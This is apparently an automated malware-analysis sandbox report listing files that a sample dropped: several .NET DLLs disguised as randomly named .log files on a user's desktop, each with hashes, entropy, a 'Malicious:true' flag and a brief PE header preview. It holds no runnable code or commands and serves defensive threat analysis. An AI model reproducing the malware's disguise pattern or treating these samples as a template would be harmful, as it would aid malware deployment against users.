                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\pqhfBjOC.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                  C:\Users\user\Desktop\qDdNmCtS.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\qZdxwwVX.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\rdSwMKLb.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\rlBOrtmg.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\rsUNXSTy.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\sSNMOgTF.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\sbztrXaK.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\tCqOXkyz.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\uZZMHXbv.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\udSmiqlo.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\unoxMcqb.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\vPiVwyIZ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\vfTLbyDe.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\wbMvdGfr.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\xMZKLDLb.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\xhGuwiIZ.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\xtgFehys.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\yYBvlMUk.log

                                                  Download File
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\zZntUmUz.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
